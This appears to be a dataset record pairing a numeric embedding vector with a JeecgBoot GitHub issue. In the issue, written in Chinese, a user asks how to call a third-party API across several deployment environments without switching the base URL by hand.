-0.005040449555963278, 0.02159159816801548, 0.0008860949310474098, 0.019744103774428368, 0.01629008911550045, -0.012876239605247974, 0.014611278660595417, 0.015711743384599686, 0.0031327095348387957, 0.002457972150295973, 0.004751276224851608, -0.010530724190175533, 0.018683800473809242, -0.023262377828359604, 0.017575304955244064, 0.008177175186574459, 0.002883699256926775, 0.010835962370038033, 0.010153192095458508, 0.0005748321418650448, -0.02848356030881405, -0.00037376637919805944, 0.008265533484518528, 0.003241149475798011, -0.00699638482183218, 0.011301852762699127, 0.016185665503144264, 0.022619768977165222, 0.009020596742630005, -0.021350620314478874, -0.024676112458109856, -0.008434218354523182, 0.0027009579353034496, -0.01347065158188343, -0.014715702272951603, 0.003038326743990183, 0.014322105795145035, 0.004795455373823643, -0.025125937536358833, -0.003933960106223822, -0.011896263808012009, 0.010048768483102322, -0.01508520171046257, -0.008699293248355389, -0.02607378363609314, -0.008028572425246239, 0.008426185697317123, -0.002389695029705763, 0.005658958572894335, 0.00004618738603312522, 0.02404957078397274, -0.002889723749831319, 0.025318719446659088, -0.0017019046936184168, -0.02125423029065132, -0.0015743874246254563, 0.0025182166136801243, 0.005281426943838596, -0.01879625767469406, -0.0013374260161072016, -0.026314761489629745, 0.014338171109557152, 0.011213493533432484, -0.02098112180829048, 0.02343909442424774, -0.0024258417543023825, -0.00005735770537285134, -0.00852257665246725, -0.008811749517917633, 0.004984221421182156, 0.005297492258250713, 0.02748751826584339, 0.007177118211984634, -0.021382750943303108, -0.007763497065752745, -0.009365998208522797, 0.007044580299407244, -0.005907969083636999, 0.009341900236904621, 0.02236272767186165, -0.013824084773659706, 0.0061087836511433125, -0.009341900236904621, -0.00531355757266283, -0.009671236388385296, 0.029495665803551674, 0.013743759132921696, 0.018876584246754646, 0.01678811013698578, 0.012338056229054928, -0.023856788873672485, -0.03055596724152565, -0.006297549698501825, -0.018185781314969063, -0.008554707281291485, 0.015559124760329723, 0.006253370083868504, 0.003056399989873171, -0.029158297926187515, -0.016579262912273407, -0.0033616384025663137, 0.006767455954104662, -0.01617763377726078, -0.005265362095087767, -0.007647024467587471, 0.00028691402985714376, -0.024354809895157814, 0.014225714839994907, 0.019985081627964973, -0.015872394666075706, -0.006956222001463175, -0.024804633110761642, 0.011880198493599892, 0.0028395201079547405, -0.01259509939700365, -0.017575304955244064, 0.00018324343545828015, -0.02618623897433281, 0.00015701200754847378, -0.013253771699965, 0.016595328226685524, -0.006209190934896469, 0.01262722909450531, -0.015109299682080746, 0.021527336910367012, -0.03177691996097565, 0.017992999404668808, -0.008635032922029495, 0.013004761189222336, -0.000852960511110723, -0.009374030865728855, -0.040259335190057755, -0.014032932929694653, -0.002911813324317336, -0.0048757814802229404, -0.0012229615822434425, -0.0023736299481242895, -0.015269950963556767, -0.008329794742166996, 0.005891903769224882, 0.0033515975810587406, -0.0009307762375101447, 0.014763898216187954, -0.017302196472883224, -0.03579321503639221, 0.007136954925954342, 0.01610534079372883, -0.011799872852861881, 0.008627000264823437, -0.006679097656160593, 0.00430546747520566, 0.007333753630518913, 0.02220207452774048, 0.003739170031622052, 0.009076825343072414, 0.013591140508651733, 0.010860060341656208, 0.011221526190638542, -0.002526249038055539, -0.011277754791080952, -0.0013795971171930432, -0.008402087725698948, -0.03466865420341492, -0.024467265233397484, -0.024965286254882812, 0.01268345769494772, 0.0203867107629776, 0.004550461657345295, -0.0005487262387759984, 0.02382465824484825, -0.000025933337383321486, -0.01754317432641983, 0.009173216298222542, -0.031070053577423096, 0.0012289860751479864, 0.004618738312274218, 0.012482643127441406, 0.00019089948909822851, -0.0041930112056434155, -0.00502840057015419, -0.007783578243106604, -0.0035363470669835806, -0.016410578042268753, 0.014370300807058811, -0.004229158163070679, 0.0047914390452206135, 0.028772732242941856, 0.0027310801669955254, 0.016772044822573662, -0.014089160598814487, 0.027680300176143646, 0.006703195162117481, -0.008353892713785172, -0.005964197218418121, -0.008956336416304111, -0.0209971871227026, 0.002757186070084572, 0.004036375787109137, -0.0011215502163395286, -0.010586951859295368, 0.013237706385552883, -0.004911927971988916, 0.004735210910439491, -0.015197657980024815, -0.012836076319217682, -0.020804405212402344, -0.04000229015946388, -0.007257443852722645, 0.018169716000556946, 0.0022129782009869814, -0.005229215137660503, -0.017511043697595596, 0.013976704329252243, 0.0033054102677851915, 0.0025985424872487783, 0.0029680414590984583, 0.013952606357634068, -0.01601698249578476, -0.004470135550945997, -0.007189166732132435, 0.039166901260614395, 0.028081929311156273, 0.00019215457723475993, -0.013567042537033558, 0.012289860285818577, -0.014828158542513847, -0.018121520057320595, 0.026057718321681023, 0.012723620980978012, -0.005719203036278486, -0.005144873168319464, 0.019711973145604134, 0.0013926500687375665, 0.013093119487166405, 0.028676342219114304, -0.009454356506466866, -0.0007023494690656662, -0.013350162655115128, 0.011880198493599892, -0.013173445127904415, -0.007028514984995127, 0.019101496785879135, 0.0019007113296538591, 0.027696365490555763, 0.020675882697105408, -0.007301623001694679, -0.01085202768445015, -0.0076028453186154366, -0.009333868511021137, -0.0041247340850532055, -0.011438406072556973, 0.007289574481546879, -0.02547937072813511, 0.004433989059180021, 0.016049113124608994, 0.007177118211984634, 0.0029298868030309677, 0.006076653487980366, -0.0007184146670624614, 0.0016386481001973152, 0.006606804206967354, -0.03285328671336174, 0.029640251770615578, 0.0019750127103179693, 0.014747832901775837, 0.015109299682080746, 0.007699236273765564, 0.01733432710170746, 0.018121520057320595, -0.01022548507899046, 0.023519419133663177, 0.022041423246264458, 0.0005723219364881516, 0.0034439724404364824, 0.009823855943977833, 0.010201388038694859, -0.029977621510624886, 0.024724308401346207, -0.011374145746231079, 0.0072373622097074986, -0.006112799979746342, -0.0018053243402391672, -0.010506626218557358, 0.005727235693484545, -0.020145732909440994, -0.014836191199719906, 0.0009322823025286198, 0.01109300460666418, 0.0004837124433834106, -0.014538985677063465, 0.006835733074694872, 0.005510355811566114, -0.0006651987787336111, -0.0037773249205201864, 0.009108955971896648, -0.00014521414414048195, -0.003108611796051264, -0.008313729427754879, 0.007450226228684187, -0.02220207452774048, -0.015663547441363335, -0.027744561433792114, 0.001770181697793305, 0.007438177242875099, -0.019535256549715996, -0.009679269045591354, 0.008490446023643017, 0.004160881042480469, 0.012064948678016663, -0.006634918507188559, -0.03179298713803291, 0.015189625322818756, 0.026170173659920692, 0.007787594571709633, -0.019374603405594826, -0.019422799348831177, 0.019872624427080154, -0.0003122669004369527, -0.016643524169921875, -0.013157380744814873, -0.006699178833514452, 0.01731826178729534, -0.028628146275877953, 0.018844453617930412, 0.013848182745277882, -0.002433874411508441, -0.024676112458109856, 0.014338171109557152, -0.01065924484282732, 0.005225198809057474, 0.005008318927139044, 0.01881232298910618, -0.004586608149111271, 0.018731996417045593, -0.01651500165462494, 0.006703195162117481, -0.010570886544883251, -0.03431521728634834, 0.020868664607405663, -0.001178782433271408, 0.0051047103479504585, 0.002670835703611374, 0.007578747346997261, -0.0007952263113111258, -0.029174361377954483, 0.015824200585484505, 0.007032531313598156, -0.007410062942653894, -0.0047713578678667545, -0.014016867615282536, 0.03833151236176491, 0.011960524134337902, -0.013928508386015892, 0.0009217395563609898, -0.011438406072556973, 0.02612197771668434, 0.026379020884633064, -0.00866716355085373, 0.02591313049197197, 0.018121520057320595, -0.015478798188269138, -0.0011175338877364993, 0.004622754640877247, -0.009896148927509785, 0.000760585768148303, -0.004409891087561846, 0.0023354750592261553, 0.005815594457089901, 0.0030302940867841244, 0.009558780118823051, -0.01202478539198637, 0.00026382034411653876, 0.010394169948995113, 0.010474495589733124, -0.030090076848864555, 0.0325801782310009, 0.007699236273765564, -0.017896607518196106, 0.008353892713785172, 0.006285500712692738, 0.0006039502914063632, 0.0019418783485889435, -0.002588501665741205, 0.03071661852300167, -0.012940500862896442, 0.0023977276869118214, -0.002100521931424737, -0.021993227303028107, -0.022941073402762413, -0.0028736586682498455, 0.010153192095458508, -0.0045584943145513535, -0.012225599959492683, -0.013454586267471313, 0.041512418538331985, 0.006510413251817226, -0.014458660036325455, -0.013679498806595802, 0.018378563225269318, -0.007530551869422197, 0.00807676836848259, -0.0051930686458945274, -0.03717482089996338, 0.0008845888078212738, 0.0029660332947969437, -0.014354236423969269, 0.010032703168690205, -0.008466348052024841, -0.006333696190267801, -0.002138676820322871, 0.04016294330358505, 0.0196798425167799, -0.028162255883216858, -0.016482872888445854, 0.013085086829960346, 0.0027531697414815426, 0.005783463828265667, 0.004317516461014748, -0.027792757377028465, 0.01371966116130352, -0.02127029560506344, 0.011566927656531334, 0.00287566683255136, 0.013526879251003265, 0.004325549118220806, -0.004164897371083498, -0.010185322724282742, -0.0008007487049326301, -0.011880198493599892, -0.0037150722928345203, 0.012747718021273613, 0.025125937536358833, 0.02154340222477913, -0.008835847489535809, 0.016579262912273407, 0.0026507542934268713, 0.0028174305334687233, -0.018073324114084244, 0.0008037608931772411, -0.006185093428939581, -0.004638819955289364, 0.016145503148436546, 0.00437374459579587, 0.013791955076158047, 0.0018615524750202894, 0.002813414204865694, 0.011783807538449764, 0.01706121861934662, -0.01699695736169815, -0.026266565546393394, -0.009791725315153599, -0.00677950493991375, 0.006016409024596214, -0.006486315280199051, -0.017784152179956436, -0.023406963795423508, 0.020467035472393036, -0.014956680126488209, -0.023198116570711136, -0.0183624979108572, -0.020258188247680664, 0.000034985689126187935, 0.011044809594750404, 0.00014546516467817128, -0.013157380744814873, 0.0069883521646261215, -0.0033977851271629333, -0.02273222617805004, -0.016964826732873917, 0.013101152144372463, 0.005530437454581261, 0.0033013939391821623, 0.00721326470375061, 0.002809397876262665, -0.0035664692986756563, -0.00983992125838995, 0.030491705983877182, 0.011880198493599892, -0.01879625767469406, 0.0007751447847113013, 0.002076424192637205, -0.006727293133735657, -0.00043953320709988475, 0.002045297995209694, -0.01804119348526001, 0.014032932929694653, -0.0005994319217279553, 0.013149348087608814, -0.01990475505590439, -0.01890871301293373, 0.0017169658094644547, 0.023406963795423508, 0.006944173015654087, 0.011141200549900532, 0.009992540813982487, 0.008132996037602425, -0.010538756847381592, -0.0037893736734986305, -0.01722186990082264, -0.008602902293205261, -0.003620689269155264, 0.0013123241951689124, -0.0237764623016119, -0.020483100786805153, -0.006434103474020958, 0.0029098051600158215, -0.005650926381349564, -0.0022230190224945545, -0.012490675784647465, 0.01853921450674534, 0.0015121347969397902, 0.008731423877179623, -0.014611278660595417, 0.016330253332853317, 0.004695048090070486, 0.011430373415350914, -0.015286016277968884, -0.009205346927046776, 0.034732915461063385, 0.001983045367524028, 0.008181191980838776, 0.010827929712831974, 0.0031206607818603516, 0.004337598104029894, 0.0183624979108572, 0.024370873346924782, -0.004022318869829178, -0.018731996417045593, 0.002427849918603897, 0.0008986458415165544, -0.010996613651514053, 0.02607378363609314, 0.014538985677063465, -0.003205002984032035, 0.01869986578822136, 0.0026788683608174324, -0.011663318611681461, -0.02498135156929493, 0.022378792986273766, 0.008329794742166996, 0.0047713578678667545, 0.004341614432632923, -0.004253255669027567, 0.008843880146741867, 0.0031487748492509127, -0.02191290259361267, 0.006811635103076696, -0.009743530303239822, -0.008940271101891994, 0.011880198493599892, -0.013213608413934708, 0.0031206607818603516, 0.0042251418344676495, 0.0021025300957262516, 0.0050966776907444, -0.01552699413150549, -0.0032813125289976597, -0.014032932929694653, 0.013221641071140766, 0.037913817912340164, 0.01114923320710659, 0.010209420695900917, -0.0006165012018755078, -0.003946009092032909, 0.015984851866960526, -0.02880486287176609, -0.022491248324513435, -0.007614894304424524, -0.028788797557353973, 0.028467494994401932, -0.015277983620762825, -0.006747374311089516, -0.005948131904006004, -0.026957368478178978, -0.011799872852861881, 0.010570886544883251, -0.016466807574033737, 0.01393654104322195, 0.010570886544883251, -0.007317688316106796, -0.0008459319942630827, 0.008353892713785172, -0.017029087990522385, -0.0028274711221456528, 0.006771472282707691, 0.01027368102222681, -0.02930288389325142, -0.006233288906514645, 0.030138272792100906, -0.005217166151851416, 0.019278213381767273, 0.02388891950249672, 0.01760743372142315, -0.0209971871227026, 0.02623443491756916, 0.010755636729300022, 0.006542543414980173, 0.017398586496710777, -0.015800101682543755, -0.0006641946965828538, -0.022378792986273766, -0.00634172884747386, 0.0028013652190566063, 0.006036490201950073, 0.0028857074212282896, -0.000012401877938827965, -0.006904010195285082, -0.0012209535343572497, -0.016595328226685524, 0.014884387142956257, 0.037303343415260315, -0.0014699636958539486, -0.0006471254164353013, -0.011566927656531334, -0.027407193556427956, 0.009582878090441227, 0.013735726475715637, 0.01079579908400774, 0.027567844837903976, -0.0073578511364758015, 0.004369728267192841, -0.022507313638925552, 0.00022880327014718205, -0.00830569677054882, -0.01918182149529457, 0.004253255669027567, -0.026700325310230255, 0.0008394055184908211, -0.004064490087330341, -0.010980548337101936, -0.005839691963046789, -0.012297892943024635, -0.008546674624085426, 0.007140971254557371, 0.00642205448821187, -0.013253771699965, -0.009928279556334019, 0.0042251418344676495, -0.004574559163302183, -0.016049113124608994, -0.006968270521610975, 0.01715760864317417, -0.0032371331471949816, 0.006361810490489006, 0.028933385387063026, -0.021495208144187927, 0.00553445378318429, -0.00940616149455309, -0.0012038842542096972, -0.009454356506466866, -0.01874806173145771, 0.02049916610121727, 0.005679040215909481, 0.02147914282977581, -0.0163141880184412, -0.012522805482149124, -0.009936312213540077, 0.0071088410913944244, 0.0013745767064392567, 0.0021949049551039934, -0.007112857419997454, 0.0031628317665308714, -0.029833033680915833, 0.009719432331621647, -0.005417981185019016, 0.028178321197628975, -0.01391244400292635, 0.016627458855509758, 0.00445407023653388, 0.0000411983928643167, 0.012217567302286625, -0.002329450799152255, -0.003636754583567381, 0.013478684239089489, 0.006317630875855684, 0.006663032341748476, -0.01706121861934662, 0.007847839035093784, -0.006080669816583395, 0.026330824941396713, -0.007361867465078831, 0.0015412529464811087, -0.002180847804993391, -0.00839405506849289, 0.007506454363465309, 0.01590452529489994, 0.0196798425167799, 0.0354076512157917, 0.010723506100475788, -0.008173159323632717, 0.00555051863193512, 0.03704629838466644, 0.01956738531589508, -0.016579262912273407, 0.002819438697770238, -0.026684259995818138, -0.01744678243994713, -0.007116873748600483, 0.008028572425246239, -0.038074471056461334, 0.005080612376332283, -0.007904067635536194, -0.012731652706861496, -0.009944344870746136, 0.008707325905561447, 0.022507313638925552, 0.009390096180140972, 0.0012159331236034632, -0.011141200549900532, 0.009542715735733509, 0.013896378688514233, 0.008189224638044834, 0.014442594721913338, 0.013101152144372463, -0.003550404217094183, 0.000202822862775065, 0.02279648743569851, 0.01219346933066845, 0.018876584246754646, 0.007960295304656029, -0.0054742093198001385, 0.016346318647265434, 0.0048757814802229404, 0.002486086217686534, 0.017029087990522385, 0.03232313692569733, 0.023053528741002083, -0.007743415422737598, -0.001329393475316465, 0.013093119487166405, -0.003407825715839863, 0.0023515403736382723, 0.0025061676278710365, -0.02584887109696865, -0.019985081627964973, 0.007209248375147581, -0.006755406968295574, -0.009582878090441227, -0.0176556296646595, -0.00021324012777768075, -0.00517700333148241, 0.014627343975007534, -0.0009418210247531533, 0.016193699091672897, -0.006060588173568249, -0.010948418639600277, -0.01385621540248394, -0.005060530733317137, -0.002628664718940854, 0.0036287219263613224, 0.012338056229054928, -0.01128578744828701, -0.010402202606201172, 0.0013745767064392567, 0.016932696104049683, -0.005393883213400841, 0.00852257665246725, 0.01136611308902502, 0.012916402891278267, -0.002624648390337825, 0.003745194524526596, 0.003913878928869963, -0.025399046018719673, -0.0075867800042033195, -0.012579034082591534, 0.002066383371129632, 0.0030604163184762, 0.029495665803551674, 0.02466004714369774, -0.0035022087395191193, 0.018137585371732712, -0.009390096180140972, 0.02257157489657402, 0.015864362940192223, 0.004000229295343161, 0.0033475812524557114, -0.013518846593797207, 0.011823970824480057, -0.007879969663918018, -0.010562853887677193, -0.0051408568397164345, 0.01194445975124836, 0.0026206320617347956, 0.008683228865265846, 0.01385621540248394, 0.0061409142799675465, 0.019342472776770592, -0.02257157489657402, -0.014892419800162315, -0.006116816308349371, 0.0005798524944111705, 0.002795340958982706, -0.004301451146602631, -0.011245624162256718, 0.01678811013698578, -0.020756209269165993, 0.008313729427754879, 0.011446438729763031, 0.015141429379582405, 0.003946009092032909, 0.024949220940470695, -0.0005688077071681619, 0.0009483475005254149, 0.022973204031586647, -0.026330824941396713, -0.0005673015839420259, 0.004940042272210121, -0.02017786353826523, -0.004578575491905212, -0.013671466149389744, -0.008418153040111065, -0.013655400834977627, -0.009092890657484531, -0.010177290067076683, -0.004638819955289364, -0.021511273458600044, 0.02557576261460781, 0.016354350373148918, -0.020097536966204643, 0.03357622027397156, -0.0010216449154540896, -0.0000340129918185994, -0.023198116570711136, -0.009076825343072414, 0.001542257028631866, 0.015189625322818756, 0.010996613651514053, -0.008876010775566101, -0.006438119802623987, 0.019647711887955666, -0.02154340222477913, -0.0006993372808210552, -0.01853921450674534, 0.000890111259650439, 0.0038054389879107475, -0.003452005097642541, 0.012530838139355183, -0.005237247794866562, -0.030298924073576927, -0.0037090477999299765, 0.004341614432632923, 0.005454127676784992, -0.0030443512368947268, -0.016113372519612312, -0.010972516611218452, 0.00014031928731128573, 0.025559697300195694, 0.007663089781999588, 0.003094554878771305, -0.01808938942849636, 0.023953178897500038, 0.001280193799175322, -0.009494519792497158, -0.003692982718348503, -0.02159159816801548, -0.018603475764393806, 0.0030483673326671124, -0.014707669615745544, 0.008811749517917633, 0.004759308882057667, -0.0038335530553013086, 0.01731826178729534, -0.0182661060243845, -0.004044408444315195, 0.007574731018394232, 0.013824084773659706, 0.00794021412730217, -0.014418496750295162, 0.019117560237646103, 0.00145891890861094, 0.01328590139746666, -0.011076940223574638, 0.00970336701720953, -0.003004188183695078, -0.012072980403900146, 0.004586608149111271, 0.004494233522564173, -0.010554821230471134, -0.01000057253986597, 0.013093119487166405, -0.005518388468772173, -0.008297664113342762, 0.0016848355298861861, -0.015181592665612698, -0.003365654731169343, 0.000599933962803334, -0.02459578588604927, 0.0050364332273602486, -0.0019689882174134254, -0.008458316326141357, -0.0007871937123127282, -0.0101933553814888, 0.026684259995818138, 0.013671466149389744, 0.009012564085423946, -0.0009373027132824063, 0.020804405212402344, 0.0037953981664031744, -0.012000687420368195, -0.016386481001973152, -0.0025804690085351467, 0.019824428483843803, -0.009936312213540077, 0.008602902293205261, 0.0032351252157241106, -0.00677950493991375, 0.008185207843780518, 0.03887772932648659, 0.012635261751711369, -0.020868664607405663, -0.0030403349082916975, -0.00803258828818798, 0.029656317085027695, -0.020948991179466248, 0.025832805782556534, -0.007293590344488621, -0.013550977222621441, -0.02065981738269329, -0.01710941456258297, 0.0010181305697187781, -0.018715931102633476, -0.013277868740260601, 0.005610763095319271, -0.010265648365020752, -0.012538870796561241, 0.0033977851271629333, -0.007614894304424524, -0.002243100432679057, -0.019213952124118805, 0.01841069385409355, -0.023712201043963432, -0.014225714839994907, -0.0006134889554232359, 0.0010412243427708745, 0.03028285875916481, 0.022587640210986137, 0.008120947517454624, 0.025929195806384087, 0.012675425037741661, 0.01000057253986597, -0.0015884444583207369, 0.0040845712646842, -0.005068563390523195, 0.006293533369898796, 0.011615123599767685, -0.01465144194662571, -0.004241206683218479, -0.01683630608022213, -0.013591140508651733, -0.005470192991197109, 0.015944689512252808, 0.009277639910578728, -0.010586951859295368, 0.016932696104049683, -0.0066911461763083935, -0.01065924484282732, -0.005855757277458906, 0.02345515973865986, -0.017559239640831947, -0.0016085258685052395, -0.018892649561166763, 0.004775374196469784, -0.006325663533061743, 0.018378563225269318, 0.017639564350247383, 0.017286131158471107, -0.004425956401973963, -0.018298236653208733, -0.00825750082731247, -0.015551092103123665, 0.00044781682663597167, 0.007385965436697006, 0.005839691963046789, 0.0024298580829054117, 0.018185781314969063, -0.011743644252419472, -0.0033475812524557114, 0.012707555666565895, 0.025013480335474014, 0.0013484708033502102, 0.000040225699194706976, -0.004369728267192841, 0.019663777202367783, 0.02247518301010132, -0.009253541938960552, -0.0014328130055218935, 0.020563427358865738, -0.005257329437881708, -0.004482184536755085, 0.00721326470375061, -0.00467496644705534, 0.001746083959005773, 0.004606689792126417, -0.006771472282707691, 0.035439781844615936, 0.007779562380164862, -0.007964312098920345, 0.03569682314991951, 0.02864421159029007, -0.00583567563444376, -0.005064547061920166, 0.01306902151554823, -0.017848411574959755, 0.0020001146476715803, -0.030475640669465065, -0.00912502035498619, -0.0033295080065727234, -0.0022933040745556355, 0.004301451146602631, 0.005968213547021151, 0.003106603631749749, 0.012948532588779926, -0.0071249064058065414, 0.024419069290161133, 0.008498478680849075, 0.009912214241921902, 0.000489736907184124, 0.01604107953608036, -0.0024720290675759315, 0.00913305301219225, 0.004932009615004063, 0.0005974237574264407, -0.004345630295574665, 0.0025985424872487783, -0.0021547419019043446, -0.015559124760329723, -0.0024318662472069263, 0.024290548637509346, 0.01000057253986597, -0.005719203036278486, 0.05111939460039139, -0.005080612376332283, -0.015237820334732533, -0.01804119348526001, 0.03428309038281441, 0.024627916514873505, 0.017302196472883224, 0.024370873346924782, -0.010570886544883251, 0.0009709391742944717, -0.008221354335546494, -0.0041207182221114635, 0.014691604301333427, -0.003672901075333357, -0.00120288017205894, 0.004365711938589811, 0.019438864663243294, 0.011173331178724766, -0.008932238444685936, -0.0011637213174253702, 0.0016788110369816422, 0.011872165836393833, -0.0013384300982579589, 0.005514372140169144, 0.03396178409457207, -0.024145960807800293, 0.009382063522934914, 0.017077283933758736, -0.003807447152212262, 0.014121291227638721, 0.010169257409870625, 0.001262120553292334, 0.01319754309952259, 0.012498708441853523, 0.003516265656799078, -0.003164839930832386, -0.017414651811122894, -0.009639106690883636, -0.0073377699591219425, 0.00751850288361311, -0.003773308591917157, 0.014490789733827114, 0.008177175186574459, 0.0264111515134573, -0.013799987733364105, -0.0038014226593077183, -0.016346318647265434, 0.00939812883734703, 0.0032491821330040693, -0.03711055964231491, 0.008112914860248566, 0.0032150435727089643, -0.0020985137671232224, -0.004201043862849474, -0.01233002357184887, 0.008859945461153984, 0.016980892047286034, -0.014265877194702625, 0.012498708441853523, 0.026105912402272224, 0.016691720113158226, -0.01128578744828701, -0.0076028453186154366, -0.00677950493991375, -0.014571116305887699, 0.0008614951511844993, -0.006831716746091843, 0.005747317336499691, -0.0047392272390425205, -0.0012751735048368573, 0.023021399974822998, -0.011044809594750404, -0.006783521268516779, 0.0054059321992099285, -0.013293934054672718, -0.006968270521610975, 0.007088759448379278, 0.0011155257234349847, -0.008811749517917633, -0.02234666235744953, 0.003337540663778782, -0.0057914964854717255, -0.008940271101891994, -0.01547076553106308, -0.010908255353569984, -0.004337598104029894, 0.021720120683312416, -0.0032190599013119936, 0.004393826238811016, -0.001820385456085205, 0.004213092848658562, 0.020836535841226578, -0.001490045222453773, -0.0044058747589588165, 0.017029087990522385, 0.01093235332518816, 0.034797172993421555, -0.02065981738269329, -0.0026607951149344444, 0.022973204031586647, 0.008643065579235554, -0.005883871112018824, -0.0015462733572348952, 0.006185093428939581, 0.004988237749785185, -0.005847724620252848, 0.0048436508513987064, -0.0069883521646261215, 0.009663204662501812, 0.007550633512437344, 0.016980892047286034, -0.03171265870332718, 0.025431176647543907, 0.002140684984624386, -0.015920590609312057, -0.005044465884566307, 0.008410120382905006, -0.005602730438113213, -0.014852256514132023, 0.010723506100475788, -0.015020940452814102, -0.01988868974149227, 0.005630844738334417, 0.019744103774428368, -0.015703711658716202, 0.014386366121470928, -0.004329565446823835, 0.011004646308720112, 0.0015302081592381, -0.010113028809428215, 0.012442479841411114, -0.0048436508513987064, 0.02613804303109646, -0.02673245593905449, 0.002014171564951539, -0.02159159816801548, -0.020916860550642014, 0.004293418489396572, 0.02885305881500244, -0.01393654104322195, -0.005417981185019016, 0.016916632652282715, -0.008956336416304111, 0.009092890657484531, 0.007325720973312855, -0.015896493569016457, -0.004036375787109137, 0.007566698361188173, -0.018442824482917786, 0.003891789121553302, 0.010884157381951809, 0.020563427358865738, 0.027455387637019157, -0.026314761489629745, -0.014836191199719906, 0.013880313374102116, 0.029254687950015068, 0.005293475929647684, -0.0037431863602250814, 0.005992311052978039, -0.023214181885123253, -0.003574501955881715, -0.006285500712692738, 0.015800101682543755, 0.0056870728731155396, 0.014643409289419651, -0.008900108747184277, 0.016659589484333992, -0.006719260476529598, 0.013390325009822845, -0.0036146650090813637, -0.016627458855509758, -0.024836763739585876, -0.006213207263499498, 0.0034861434251070023, 0.022828616201877594, -0.028403233736753464, 0.054300300776958466, -0.0051047103479504585, -0.0073056393302977085, -0.04263697937130928, 0.004082563333213329, -0.02027425356209278, 0.00874748919159174, 0.004976188763976097, -0.001665758085437119, 0.008803716860711575, 0.001138619496487081, -0.022603705525398254, 0.0051247915253043175, -0.007771529722958803, 0.00634172884747386, -0.0003976131556555629, 0.0024599803145974874, -0.02443513460457325, -0.010779733769595623, -0.0010432325070723891, 0.010916288010776043, -0.007968327961862087, 0.0008007487049326301, 0.010908255353569984, 0.012699523009359837, -0.005570600274950266, -0.005293475929647684, 0.004691031761467457, 0.01219346933066845, -0.02234666235744953, 0.0006260398658923805, 0.00728154182434082, 0.004956107120960951, 0.0012661367654800415, 0.001677806954830885, 0.011374145746231079, -0.012016752734780312, 0.015189625322818756, -0.00852257665246725, -0.009695334360003471, -0.018989039584994316, -0.006747374311089516, 0.016354350373148918, -0.01590452529489994, -0.0007269493071362376, 0.01391244400292635, 0.027294736355543137, 0.0011014686897397041, 0.002526249038055539, 0.005289459601044655, 0.004550461657345295, 0.006253370083868504, -0.03094153106212616, 0.013759824447333813, -0.009076825343072414, 0.014804060570895672, -0.004301451146602631, 0.02147914282977581, -0.00962304137647152, -0.0047392272390425205, -0.016330253332853317, -0.021495208144187927, 0.005566583946347237, 0.010594984516501427, -0.006209190934896469, 0.022443052381277084, 0.02361581102013588, 0.009984508156776428, 0.019985081627964973, 0.002628664718940854, -0.018876584246754646, -0.005526421125978231, 0.01429800782352686, -0.0010442365892231464, 0.015197657980024815, -0.01407309528440237, -0.01610534079372883, 0.002727063838392496, -0.006510413251817226, 0.003112628124654293, 0.013984736986458302, -0.0053376550786197186, 0.014322105795145035, -0.006956222001463175, 0.0018916745902970433, -0.000022089618141762912, -0.005666991230100393, 0.0046709501184523106, -0.01369556412100792, -0.003721096785739064, 0.028708472847938538, -0.008036605082452297, 0.007558666169643402, -0.0021366686560213566, -0.020129667595028877, -0.017687760293483734, -0.0004671452334150672, -0.018764127045869827, 0.0013484708033502102, 0.014193584211170673, 0.00795226264744997, 0.016868436709046364, 0.0001629109465284273, 0.014547018334269524, -0.0012540878960862756, -0.005759366322308779, 0.02591313049197197, -0.01172757986932993, -0.014185551553964615, 0.024997416883707047, 0.011109069921076298, 0.027423257008194923, -0.0025644039269536734, -0.019213952124118805, 0.005602730438113213, 0.006470250431448221, 0.010032703168690205, 0.0004535902407951653, 0.00940616149455309, 0.0023174018133431673, 0.006381891667842865, -0.005229215137660503, -0.00641000596806407, -0.027696365490555763, 0.003365654731169343, -0.0007068677805364132, 0.007157036568969488, -0.027407193556427956, 0.0017069251043722034, 0.03415456786751747, 0.00047316966811195016, -0.03275689855217934, 0.004682999104261398, 0.00810086540877819, -0.004980205092579126, 0.017575304955244064, 0.010482528246939182, 0.01984049379825592, 0.026105912402272224, 0.007964312098920345, -0.006377875339239836, 0.01754317432641983, -0.002496127039194107, -0.0069361403584480286, -0.028049800544977188, 0.006494347937405109, -0.010603017173707485, -0.032997872680425644, -0.011470536701381207, -0.05426817014813423, 0.025720348581671715, 0.02181651070713997, 0.023423029109835625, 0.0013956623151898384, -0.009197314269840717, 0.010153192095458508, -0.0038456018082797527, 0.02098112180829048, 0.02466004714369774, 0.0020372653380036354, 0.01760743372142315, -0.0038817485328763723, -0.011293820105493069, 0.02645934745669365, 0.015374374575912952, -0.009084858000278473, 0.00634172884747386, 0.007462274748831987, -0.013679498806595802, 0.012273795902729034, -0.02907797135412693, 0.024226287379860878, -0.02343909442424774, -0.003994204569607973, 0.032612308859825134, 0.0051930686458945274, 0.009365998208522797, 0.004341614432632923, 0.005152905825525522, 0.014185551553964615, -0.011221526190638542, 0.01622582972049713, -0.005819610320031643, 0.006397956982254982, 0.01415342092514038, -0.010016637854278088, -0.013647368177771568, -0.025559697300195694, -0.007679154630750418, -0.0034258991945534945, 0.011936427094042301, -0.008586836978793144, 0.009293705224990845, -0.015808135271072388, -0.013960639014840126, 0.002813414204865694, -0.00089312344789505, -0.001844483194872737, 0.0020362611394375563, -0.006136897951364517, -0.002239084104076028, -0.014836191199719906, 0.010249583050608635, 0.006414022296667099 ]
null
null
null
null
null
null
null
null
null
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.6.3 ##### 分支: master?还是springboot3? master ##### 前端版本: vue3版?还是 vue2版? vue3 ##### 问题描述: 写接口的时候,要在这个接口里去调用第三方接口,并且第三方接口有多个部署环境,有不需要手动切换baseurl的实现方式吗 ##### 截图&代码: #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖、描述过于简抽象的,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能; - springboot3_sas分支采用 `Spring Authorization Server` 替换 `Shiro`,目前是beta版不稳定,生产项目不要使用;
写接口的时候,要在这个接口里去调用第三方接口,并且第三方接口有多个部署环境,有不需要手动切换baseurl的实现方式吗
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/6269/comments
1
2024-05-31T05:41:20
2024-06-27T13:58:49Z
https://github.com/jeecgboot/JeecgBoot/issues/6269
2,327,004,527
6,269
false
